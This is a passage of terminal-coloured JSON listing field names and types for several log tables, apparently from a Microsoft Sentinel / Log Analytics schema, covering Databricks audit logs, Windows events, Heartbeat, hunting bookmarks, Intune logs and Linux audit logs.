\u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksDBFS\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksJobs\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksNotebook\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSQLPermissions\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSSH\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksSecrets\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksTables\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksWorkspace\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ETWEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Event\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventCategory\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventLevel\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventLevelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventLog\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ParameterXml\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RenderedDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Heartbeat\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerEnvironment\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsGatewayInstalled\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSMajorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSMinorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SCAgentChannel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solutions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VMUUID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Version\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"HuntingBookmark\"\u001b[39;49;00m: {\n        \u001b[94m\"BookmarkId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"BookmarkName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"BookmarkType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"LastUpdatedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Notes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryResultRow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryText\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SoftDeleted\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UpdatedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"IntuneAuditLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"IntuneOperationalLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"LinuxAuditLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AuditID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerEnvironment\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalAgentIp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RawRecord\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SerialNumber\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeUploaded\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: 